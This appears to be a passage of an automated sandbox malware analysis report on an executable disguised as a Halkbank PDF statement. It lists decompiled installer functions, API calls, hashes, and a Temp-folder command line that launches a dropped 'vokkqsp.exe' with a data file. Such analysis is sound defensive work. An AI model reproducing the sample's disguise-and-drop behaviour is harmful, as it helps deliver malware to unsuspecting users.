                                                      0x00405821
                                                      0x00405824
                                                      0x004059ba
                                                      0x004059de
                                                      0x004059de
                                                      0x004059f1
                                                      0x00405a0f
                                                      0x00405a11
                                                      0x00405a19
                                                      0x00405a6f
                                                      0x00405a73
                                                      0x00000000
                                                      0x00000000
                                                      0x00405a75
                                                      0x00405a7b
                                                      0x00000000
                                                      0x00000000
                                                      0x00405a85
                                                      0x00405a8d
                                                      0x00405a90
                                                      0x00405b92
                                                      0x00000000
                                                      0x00405b92
                                                      0x00405a9f
                                                      0x00405aaa
                                                      0x00405ab3
                                                      0x00405abe
                                                      0x00405ac1
                                                      0x00405aca
                                                      0x00405ad0
                                                      0x00405ad3
                                                      0x00405ad3
                                                      0x00405aeb
                                                      0x00405af4
                                                      0x00405af7
                                                      0x00405afe
                                                      0x00405b05
                                                      0x00405b0d
                                                      0x00405b0d
                                                      0x00405b24
                                                      0x00405b24
                                                      0x00405b2b
                                                      0x00405b31
                                                      0x00405b3d
                                                      0x00405b44
                                                      0x00405b4d
                                                      0x00405b4f
                                                      0x00405b52
                                                      0x00405b61
                                                      0x00405b64
                                                      0x00405b6a
                                                      0x00405b6b
                                                      0x00405b71
                                                      0x00405b72
                                                      0x00405b73
                                                      0x00405b7b
                                                      0x00405b86
                                                      0x00405b8c
                                                      0x00405b8c
                                                      0x00000000
                                                      0x00405aeb
                                                      0x00405a21
                                                      0x00405a51
                                                      0x00405a59
                                                      0x00405a64
                                                      0x00405a64
                                                      0x00405a6a
                                                      0x00000000
                                                      0x00405a6a
                                                      0x00405a25
                                                      0x00405a2f
                                                      0x00000000
                                                      0x004059f3
                                                      0x004059f9
                                                      0x00405a34
                                                      0x00000000
                                                      0x00405a3d
                                                      0x00405a02
                                                      0x00405a07
                                                      0x00405a0a
                                                      0x00000000
                                                      0x00405a0a
                                                      0x004059f1
                                                      0x0040582a
                                                      0x0040582e
                                                      0x00405836
                                                      0x0040583a
                                                      0x0040583d
                                                      0x00405840
                                                      0x00405843
                                                      0x00405846
                                                      0x00405847
                                                      0x00405848
                                                      0x00405861
                                                      0x00405864
                                                      0x0040586e
                                                      0x0040587d
                                                      0x00405885
                                                      0x0040588d
                                                      0x00405892
                                                      0x00405895
                                                      0x004058a1
                                                      0x004058aa
                                                      0x004058b3
                                                      0x004058d5
                                                      0x004058db
                                                      0x004058ec
                                                      0x004058f1
                                                      0x004058ff
                                                      0x0040590d
                                                      0x0040590d
                                                      0x00405912
                                                      0x00405920
                                                      0x00405920
                                                      0x00405925
                                                      0x00405928
                                                      0x0040592d
                                                      0x00405939
                                                      0x00405942
                                                      0x0040594f
                                                      0x0040595e
                                                      0x00405951
                                                      0x00405956
                                                      0x00405956
                                                      0x0040596a
                                                      0x0040596a
                                                      0x0040597e
                                                      0x00405987
                                                      0x00405990
                                                      0x004059a0
                                                      0x004059ac
                                                      0x004059ac
                                                      0x00000000

                                                      APIs
                                                      • GetDlgItem.USER32 ref: 00405867
                                                      • GetDlgItem.USER32 ref: 00405876
                                                      • GetClientRect.USER32 ref: 004058B3
                                                      • GetSystemMetrics.USER32 ref: 004058BA
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                      • ShowWindow.USER32(?,00000008), ref: 00405956
                                                      • GetDlgItem.USER32 ref: 00405977
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                      • GetDlgItem.USER32 ref: 00405885
                                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                      • GetDlgItem.USER32 ref: 004059C9
                                                      • CreateThread.KERNEL32 ref: 004059D7
                                                      • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                      • ShowWindow.USER32(00000000), ref: 00405A02
                                                      • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                      • ShowWindow.USER32(00000008), ref: 00405A51
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                      • CreatePopupMenu.USER32 ref: 00405A96
                                                      • AppendMenuW.USER32 ref: 00405AAA
                                                      • GetWindowRect.USER32 ref: 00405ACA
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                      • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                      • EmptyClipboard.USER32 ref: 00405B31
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                      • GlobalLock.KERNEL32 ref: 00405B47
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                      • SetClipboardData.USER32 ref: 00405B86
                                                      • CloseClipboard.USER32 ref: 00405B8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: H7B${
                                                      • API String ID: 590372296-2256286769
                                                      • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                      • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                      • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                      • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                      0x00404ab5
                                                      0x00404abb
                                                      0x00404ac1
                                                      0x00404ace
                                                      0x00404adc
                                                      0x00404adf
                                                      0x00404ae7
                                                      0x00404aed
                                                      0x00404aed
                                                      0x00404af9
                                                      0x00404afc
                                                      0x00404b6a
                                                      0x00404b71
                                                      0x00404c48
                                                      0x00404c4f
                                                      0x00404c5e
                                                      0x00404c5e
                                                      0x00404c62
                                                      0x00404c6c
                                                      0x00404c79
                                                      0x00404c7b
                                                      0x00404c7b
                                                      0x00404c89
                                                      0x00404c90
                                                      0x00404c97
                                                      0x00404c9a
                                                      0x00404cd6
                                                      0x00404cd8
                                                      0x00404cde
                                                      0x00404ce3
                                                      0x00404ce7
                                                      0x00404ce9
                                                      0x00404ce9
                                                      0x00404d05
                                                      0x00000000
                                                      0x00404d07
                                                      0x00404d0a
                                                      0x00404d18
                                                      0x00404d1e
                                                      0x00404d1f
                                                      0x00404d22
                                                      0x00404d25
                                                      0x00000000
                                                      0x00404d25
                                                      0x00404c9c
                                                      0x00404c9e
                                                      0x00404ca2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404ca4
                                                      0x00404ca4
                                                      0x00404cb1
                                                      0x00404cb6
                                                      0x00000000
                                                      0x00000000
                                                      0x00404cba
                                                      0x00404cbc
                                                      0x00404cbc
                                                      0x00404cc5
                                                      0x00404cc7
                                                      0x00404ccc
                                                      0x00404ccf
                                                      0x00404cd4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404cd4
                                                      0x00404d31
                                                      0x00404d3b
                                                      0x00404d3e
                                                      0x00404d41
                                                      0x00404d48
                                                      0x00404d48
                                                      0x00404d4a
                                                      0x00404d4a
                                                      0x00404d4f
                                                      0x00404d51
                                                      0x00404d59
                                                      0x00404d60
                                                      0x00404d62
                                                      0x00404d6d
                                                      0x00404d6d
                                                      0x00404d62
                                                      0x00404d7d
                                                      0x00404d87
                                                      0x00404d8f
                                                      0x00404daa
                                                      0x00404d91
                                                      0x00404d9a
                                                      0x00404d9a
                                                      0x00404d8f
                                                      0x00404daf
                                                      0x00404db4
                                                      0x00404db9
                                                      0x00404dc2
                                                      0x00404dc2
                                                      0x00404dcb
                                                      0x00404dcd
                                                      0x00404dcd
                                                      0x00404dd9
                                                      0x00404de1
                                                      0x00404deb
                                                      0x00404deb
                                                      0x00404df0
                                                      0x00000000
                                                      0x00404df0
                                                      0x00404c9a
                                                      0x00404c51
                                                      0x00404c58
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404c58
                                                      0x00404b77
                                                      0x00404b80
                                                      0x00404b9a
                                                      0x00404b9f
                                                      0x00404ba9
                                                      0x00404bb0
                                                      0x00404bbc
                                                      0x00404bbf
                                                      0x00404bc2
                                                      0x00404bc9
                                                      0x00404bd1
                                                      0x00404bd4
                                                      0x00404bd8
                                                      0x00404bdf
                                                      0x00404be7
                                                      0x00404c41
                                                      0x00404be9
                                                      0x00404bea
                                                      0x00404bf1
                                                      0x00404bfb
                                                      0x00404c03
                                                      0x00404c10
                                                      0x00404c24
                                                      0x00404c28
                                                      0x00404c28
                                                      0x00404c24
                                                      0x00404c2d
                                                      0x00404c3a
                                                      0x00404c3a
                                                      0x00404be7
                                                      0x00000000
                                                      0x00404b9f
                                                      0x00404b8d
                                                      0x00000000
                                                      0x00000000
                                                      0x00404b93
                                                      0x00000000
                                                      0x00404afe
                                                      0x00404b0b
                                                      0x00404b14
                                                      0x00404b21
                                                      0x00404b21
                                                      0x00404b28
                                                      0x00404b2e
                                                      0x00404b37
                                                      0x00404b3a
                                                      0x00404b3d
                                                      0x00404b45
                                                      0x00404b48
                                                      0x00404b4b
                                                      0x00404b51
                                                      0x00404b58
                                                      0x00404b5f
                                                      0x00404df6
                                                      0x00404e08
                                                      0x00404b65
                                                      0x00404b68
                                                      0x00000000
                                                      0x00404b68
                                                      0x00404b5f

                                                      APIs
                                                      • GetDlgItem.USER32 ref: 00404B04
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                      • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00423748,00000000,?,?), ref: 00404C1C
                                                      • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf), ref: 00404C28
                                                      • SetDlgItemTextW.USER32 ref: 00404C3A
                                                        • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                        • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                        • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                        • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                        • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$A$C:\Users\user\AppData\Local\Temp$H7B
                                                      • API String ID: 2624150263-2901825404
                                                      • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                      • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                      • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                      • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                      0x004021b3
                                                      0x004021bd
                                                      0x004021c7
                                                      0x004021d1
                                                      0x004021dc
                                                      0x004021df
                                                      0x004021f9
                                                      0x004021fc
                                                      0x00402202
                                                      0x00402205
                                                      0x0040220f
                                                      0x00402213
                                                      0x00402213
                                                      0x00402218
                                                      0x00402229
                                                      0x00402231
                                                      0x004022e8
                                                      0x004022e8
                                                      0x004022ef
                                                      0x00402237
                                                      0x00402237
                                                      0x00402246
                                                      0x0040224a
                                                      0x0040224d
                                                      0x00402253
                                                      0x00402261
                                                      0x00402264
                                                      0x00402266
                                                      0x00402271
                                                      0x00402271
                                                      0x00402276
                                                      0x00402278
                                                      0x0040227f
                                                      0x0040227f
                                                      0x00402282
                                                      0x0040228b
                                                      0x0040228e
                                                      0x00402294
                                                      0x00402296
                                                      0x004022a0
                                                      0x004022a0
                                                      0x004022a3
                                                      0x004022ac
                                                      0x004022af
                                                      0x004022b8
                                                      0x004022be
                                                      0x004022c0
                                                      0x004022ce
                                                      0x004022ce
                                                      0x004022d1
                                                      0x004022d7
                                                      0x004022d7
                                                      0x004022da
                                                      0x004022e0
                                                      0x004022e6
                                                      0x004022fb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004022e6
                                                      0x004022f1
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                      • API String ID: 542301482-47812868
                                                      • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                      • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                      • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                      • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 39%
                                                      			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                      0x00402923
                                                      0x0040293e
                                                      0x00402949
                                                      0x0040294a
                                                      0x00402a94
                                                      0x00402925
                                                      0x00402928
                                                      0x0040292b
                                                      0x0040292e
                                                      0x0040292e
                                                      0x00402c2d
                                                      0x00402c39
